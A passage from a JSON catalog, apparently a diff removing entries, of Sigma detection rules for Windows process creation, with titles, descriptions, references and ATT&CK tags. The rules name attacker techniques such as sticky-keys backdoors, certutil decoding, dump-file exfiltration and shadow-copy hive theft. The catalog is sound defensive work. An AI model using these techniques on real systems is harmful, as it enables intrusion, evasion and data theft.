authenticating to the system.\nWhen the sticky keys are 
\"activated\" the privilleged shell is launched.\n", - "uuid": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", - "value": "Sticky-Key Backdoor Copy Cmd.exe", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html", - "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml" - ], - "tags": [ - "attack.t1546.008", - "attack.privilege_escalation" - ], - "creation_date": "2020/02/18", - "filename": "proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml", - "author": "Sreeman", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", - "uuid": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", - "value": "Execution via stordiag.exe", - "meta": { - "refs": [ - "https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html", - "https://twitter.com/eral4m/status/1451112385041911809", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stordiag_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2021/10/21", - "filename": "proc_creation_win_stordiag_execution.yml", - "author": "Austin Songer (@austinsonger)", - "level": "high", - "falsepositive": [ - "Legitimate usage of stordiag.exe." 
- ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", - "uuid": "16905e21-66ee-42fe-b256-1318ada2d770", - "value": "Start of NT Virtual DOS Machine", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", - "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7", - "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", - "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/07/16", - "filename": "proc_creation_win_susp_16bit_application.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of 3proxy, a tiny free proxy server", - "uuid": "f38a82d2-fba3-4781-b549-525efbec8506", - "value": "3Proxy Usage", - "meta": { - "refs": [ - "https://github.com/3proxy/3proxy", - "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572" - ], - "creation_date": "2022/09/13", - "filename": "proc_creation_win_susp_3proxy_usage.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - 
"logsource.product": "windows" - } - }, - { - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", - "uuid": "9fbf5927-5261-4284-a71d-f681029ea574", - "value": "Compress Data and Lock With Password for Exfiltration With 7-ZIP", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_7z.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ], - "creation_date": "2021/07/27", - "filename": "proc_creation_win_susp_7z.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Command line parameter combinations that contain all included strings" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious 7zip execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration", - "uuid": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", - "value": "7Zip Compressing Dump Files", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_7zip_dmp.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ], - "creation_date": "2022/09/27", - "filename": "proc_creation_win_susp_7zip_dmp.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate use of 7-Zip with a command line in which .dmp appears accidentally" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", - "uuid": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", - "value": "Add 
User to Local Administrators", - "meta": { - "refs": [ - "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2022/08/12", - "filename": "proc_creation_win_susp_add_local_admin.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", - "uuid": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", - "value": "Suspicious Add User to Remote Desktop Users Group", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml" - ], - "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1133", - "attack.t1136.001", - "attack.t1021.001" - ], - "creation_date": "2021/12/06", - "filename": "proc_creation_win_susp_add_user_remote_desktop.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of a AdFind for enumeration based on it's commadline flags", - "uuid": "455b9d50-15a1-4b99-853f-8d37655a4c1b", - "value": "Suspicious AdFind Enumeration", - "meta": { - "refs": [ - "https://www.joeware.net/freetools/tools/adfind/", - "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_enumeration.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.002" - ], - "creation_date": "2021/12/13", - "filename": "proc_creation_win_susp_adfind_enumeration.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", - "uuid": "9a132afa-654e-11eb-ae93-0242ac130002", - "value": "AdFind Usage Detection", - "meta": { - "refs": [ - "https://www.joeware.net/freetools/tools/adfind/", - "https://thedfirreport.com/2020/05/08/adfind-recon/", - "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", - "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_usage.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" - ], - "creation_date": "2021/02/02", - "filename": "proc_creation_win_susp_adfind_usage.yml", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate admin activity" - ], - 
"logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\nUsee to Query/modify DNS records for Active Directory integrated DNS via LDAP\n", - "uuid": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", - "value": "Suspicious Execution of Adidnsdump", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adidnsdump.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018" - ], - "creation_date": "2022/01/01", - "filename": "proc_creation_win_susp_adidnsdump.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of AdvancedRun utility", - "uuid": "d2b749ee-4225-417e-b20e-a8d2193cbb84", - "value": "Suspicious AdvancedRun Execution", - "meta": { - "refs": [ - "https://twitter.com/splinter_code/status/1483815103279603714", - "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", - "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml" - ], - "tags": "No established tags", - "creation_date": "2022/01/20", - "filename": "proc_creation_win_susp_advancedrun.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": 
"process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", - "uuid": "fa00b701-44c6-4679-994d-5a18afa8a707", - "value": "Suspicious AdvancedRun Runas Priv User", - "meta": { - "refs": [ - "https://twitter.com/splinter_code/status/1483815103279603714", - "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", - "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml" - ], - "tags": "No established tags", - "creation_date": "2022/01/20", - "filename": "proc_creation_win_susp_advancedrun_priv_user.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "uuid": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", - "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_athremotefxvgpudisablementcommand.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - 
"creation_date": "2021/07/13", - "filename": "proc_creation_win_susp_athremotefxvgpudisablementcommand.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects base64 encoded powershell 'Invoke-' call", - "uuid": "6385697e-9f1b-40bd-8817-f4a91f40508e", - "value": "Suspicious Base64 Encoded Powershell Invoke", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_invoke.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2022/05/20", - "filename": "proc_creation_win_susp_base64_invoke.yml", - "author": "pH-T", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", - "uuid": "9c0295ce-d60d-40bd-bd74-84673b7592b1", - "value": "Suspicious Encoded Obfuscated LOAD String", - "meta": { - "refs": [ - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2022/03/01", - "filename": "proc_creation_win_susp_base64_load.yml", - "author": "pH-T", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects, 
possibly, malicious unauthorized usage of bcdedit.exe", - "uuid": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", - "value": "Possible Ransomware or Unauthorized MBR Modifications", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set", - "https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bcdedit.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.persistence", - "attack.t1542.003" - ], - "creation_date": "2019/02/07", - "filename": "proc_creation_win_susp_bcdedit.yml", - "author": "@neu5ron", - "level": "medium", - "falsepositive": "No established falsepositives", - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Execute VBscript code that is referenced within the *.bgi file.", - "uuid": "aaf46cdc-934e-4284-b329-34aa701e3771", - "value": "Application Whitelisting Bypass via Bginfo", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", - "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bginfo.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" - ], - "creation_date": "2019/10/26", - "filename": "proc_creation_win_susp_bginfo.yml", - "author": "Beyu Denis, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects transferring files from system on a server bitstransfer Powershell cmdlets", - "uuid": "cd5c8085-4070-4e22-908d-a5b3342deb74", - "value": "Suspicious Bitstransfer via PowerShell", - "meta": { - "refs": [ - 
"https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bitstransfer.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.persistence", - "attack.t1197" - ], - "creation_date": "2021/08/19", - "filename": "proc_creation_win_susp_bitstransfer.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of a set of builtin commands often used in recon stages by different attack groups", - "uuid": "2887e914-ce96-435f-8105-593937e90757", - "value": "Reconnaissance Activity Using BuiltIn Commands", - "meta": { - "refs": [ - "https://twitter.com/haroonmeer/status/939099379834658817", - "https://twitter.com/c_APT_ure/status/939475433711722497", - "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" - ], - "creation_date": "2018/08/22", - "filename": "proc_creation_win_susp_builtin_commands_recon.yml", - "author": "Florian Roth, Markus Neis", - "level": "medium", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", - "uuid": "737e618a-a410-49b5-bec3-9e55ff7fbc15", - "value": "Suspicious Calculator Usage", - "meta": { - "refs": [ - 
"https://twitter.com/ItsReallyNick/status/1094080242686312448", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_calc.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ], - "creation_date": "2019/02/09", - "filename": "proc_creation_win_susp_calc.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Launch 64-bit shellcode from a debugger script file using cdb.exe.", - "uuid": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", - "value": "Possible App Whitelisting Bypass via WinDbg/CDB as a Shellcode Runner", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/", - "http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html", - "https://twitter.com/nas_bench/status/1534957360032120833", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cdb.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1218", - "attack.t1127" - ], - "creation_date": "2019/10/26", - "filename": "proc_creation_win_susp_cdb.yml", - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of debugging tools" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code", - "uuid": "e011a729-98a6-4139-b5c4-bf6f6dd8239a", - "value": "Suspicious Certutil Command Usage", - "meta": { - "refs": [ - "https://twitter.com/JohnLaTwC/status/835149808817991680", - "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/", - 
"https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/", - "https://twitter.com/egre55/status/1087685529016193025", - "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.command_and_control", - "attack.t1105", - "attack.s0160", - "attack.g0007", - "attack.g0010", - "attack.g0045", - "attack.g0049", - "attack.g0075", - "attack.g0096" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_certutil_command.yml", - "author": "Florian Roth, juju4, keepwatch", - "level": "high", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious a certutil command that used to encode files, which is sometimes used for data exfiltration", - "uuid": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", - "value": "Certutil Encode", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", - "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2019/02/24", - "filename": "proc_creation_win_susp_certutil_encode.yml", - "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or 
otherwise obfuscating its contents on the system or in transit.", - "uuid": "e0552b19-5a83-4222-b141-b36184bb8d79", - "value": "Obfuscated Command Line Using Special Unicode Characters", - "meta": { - "refs": [ - "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_char_in_cmd.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2022/01/15", - "filename": "proc_creation_win_susp_char_in_cmd.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", - "uuid": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", - "value": "Suspicious Child Process Created as System", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", - "https://github.com/antonioCoco/RogueWinRM", - "https://twitter.com/Cyb3rWard0g/status/1453123054243024897", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1134.002" - ], - "creation_date": "2019/10/26", - "filename": "proc_creation_win_susp_child_process_as_system_.yml", - "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": 
"process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", - "uuid": "4b046706-5789-4673-b111-66f25fe99534", - "value": "Overwrite Deleted Data with Cipher", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cipher.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ], - "creation_date": "2021/12/26", - "filename": "proc_creation_win_susp_cipher.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious process that use escape characters", - "uuid": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", - "value": "Suspicious Commandline Escape", - "meta": { - "refs": [ - "https://twitter.com/vysecurity/status/885545634958385153", - "https://twitter.com/Hexacorn/status/885553465417756673", - "https://twitter.com/Hexacorn/status/885570278637678592", - "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", - "http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_escape.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140" - ], - "creation_date": "2018/12/11", - "filename": "proc_creation_win_susp_cli_escape.yml", - "author": "juju4", - 
"level": "low", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of a CLSID folder name located in a suspicious location from the commandline as seen being used in IcedID", - "uuid": "90b63c33-2b97-4631-a011-ceb0f47b77c3", - "value": "Suspicious CLSID Folder Name In Suspicious Locations", - "meta": { - "refs": [ - "https://twitter.com/Kostastsale/status/1565257924204986369", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_clsid_foldername.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2022/09/01", - "filename": "proc_creation_win_susp_clsid_foldername.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Some FP is expected with some installers" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", - "uuid": "178e615d-e666-498b-9630-9ed363038101", - "value": "Suspicious Elevated System Shell", - "meta": { - "refs": [ - "https://github.com/Wh04m1001/SysmonEoP", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/12/05", - "filename": "proc_creation_win_susp_cmd.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. 
This could be indicative of adversary lateral movement.", - "uuid": "e31f89f7-36fb-4697-8ab6-48823708353b", - "value": "Suspicious Cmd Execution via WMI", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_exectution_via_wmi.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ], - "creation_date": "2022/09/27", - "filename": "proc_creation_win_susp_cmd_exectution_via_wmi.yml", - "author": "Tim Rauch", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", - "uuid": "1ac8666b-046f-4201-8aba-1951aaec03a3", - "value": "Command Line Execution with Suspicious URL and AppData Strings", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100", - "https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_http_appdata.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_cmd_http_appdata.yml", - "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", - "level": "medium", - "falsepositive": [ - "High" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a copy execution that targets a shadow copy (sometimes used to copy registry hives 
that are in use)", - "uuid": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", - "value": "Copy from Volume Shadow Copy", - "meta": { - "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2021/08/09", - "filename": "proc_creation_win_susp_cmd_shadowcopy_access.yml", - "author": "Max Altgelt, Tobias Michalski", - "level": "medium", - "falsepositive": [ - "Some rare backup scenarios" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects use of chcp to look up the system locale value as part of host discovery", - "uuid": "7090adee-82e2-4269-bd59-80691e7c6338", - "value": "CHCP CodePage Locale Lookup", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1614.001" - ], - "creation_date": "2022/02/21", - "filename": "proc_creation_win_susp_codepage_lookup.yml", - "author": "_pete_0, TheDFIRReport", - "level": "high", - "falsepositive": [ - 